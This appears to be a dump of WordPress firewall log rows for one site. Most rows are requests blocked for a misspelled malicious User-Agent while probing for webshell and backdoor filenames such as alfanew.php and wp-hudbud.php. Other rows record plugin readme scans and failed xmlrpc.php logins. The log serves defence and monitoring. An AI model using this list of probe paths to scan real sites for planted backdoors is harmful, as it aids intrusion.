(50850, 1712062373.522949, 1712062373.118800, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(50897, 1712082235.675175, 1712082235.327500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(50823, 1712000691.928416, 1712000691.481400, '\0\0\0\0\0\0\0\0\0\0ÿÿ_ÓD', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50829, 0.000000, 1712004943.655062, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 1, 200, 0, 1, 0, 'https://www.happythinking.com/wp-login.php?action=logout&_wpnonce=5d06ca4687', 'https://www.happythinking.com/wp-admin/export.php', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36', 'logout', NULL, NULL),
(50830, 1712014235.004322, 1712014234.581100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50824, 1712000691.928069, 1712000691.481400, '\0\0\0\0\0\0\0\0\0\0ÿÿ_ÓD', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50805, 1712000198.102678, 1712000197.312800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50678, 1711738124.680605, 1711738124.382400, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4x', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50675, 1711731870.791364, 1711731870.400300, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vYWxmYW5ldy5waHA=","category":"brute-force","ssl":1}'),
(50828, 0.000000, 1712002163.758588, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 0, 302, 0, 1, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.happythinking.com%2Fwp-admin%2F&reauth=1', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36', 'loginOK', NULL, NULL),
(50825, 0.000000, 1712000950.531431, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50826, 0.000000, 1712000953.718391, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50821, 1712000412.488104, 1712000411.525800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(50673, 1711731874.627012, 1711731874.093600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/js/widgets/about.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vanMvd2lkZ2V0cy9hYm91dC5waHA3","category":"brute-force","ssl":1}'),
(51865, 0.000000, 1712531236.883175, '\0\0\0\0\0\0\0\0\0\0ÿÿ&‰ÆB', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51866, 0.000000, 1712546968.633818, '\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51867, 0.000000, 1712547113.289943, '\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51868, 0.000000, 1712547261.077408, '\0\0\0\0\0\0\0\0\0\0ÿÿpÄ	D', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51869, 0.000000, 1712548472.182931, '\0\0\0\0\0\0\0\0\0\0ÿÿz°–9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51870, 0.000000, 1712552813.151929, '\0\0\0\0\0\0\0\0\0\0ÿÿg`-ˆ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51871, 1712562407.936459, 1712562407.146400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==","category":"brute-force","ssl":1}'),
(52004, 1712689940.448049, 1712689940.127400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-hudbud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWh1ZGJ1ZC5waHA=","category":"brute-force","ssl":1}'),
(51904, 1712637000.624007, 1712637000.254900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(51888, 1712582139.928901, 1712582139.439400, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/test/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3Rlc3Qvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50929, 1712082449.935574, 1712082449.485100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51913, 1712636851.130286, 1712636850.710100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50907, 1712082594.561361, 1712082592.333000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/test.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Rlc3QucGhw","category":"brute-force","ssl":1}'),
(50887, 1712082312.112779, 1712082311.743500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50868, 1712062415.328306, 1712062414.816400, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/as.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FzLnBocA==","category":"brute-force","ssl":1}'),
(50869, 1712062414.008967, 1712062413.493500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/ini.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luaS5waHA=","category":"brute-force","ssl":1}'),
(50886, 1712082341.376626, 1712082340.823800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50870, 1712062412.678889, 1712062412.239900, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(50885, 1712082353.130990, 1712082352.700500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50454, 1711359162.762276, 1711359162.397500, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/universal-news/www.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3VuaXZlcnNhbC1uZXdzL3d3dy5waHA=","category":"brute-force","ssl":1}'),
(50453, 1711359165.879587, 1711359165.468800, '\0\0\0\0\0\0\0\0\0\0ÿÿT÷ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/repeater.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50924, 1712082489.614511, 1712082489.003700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
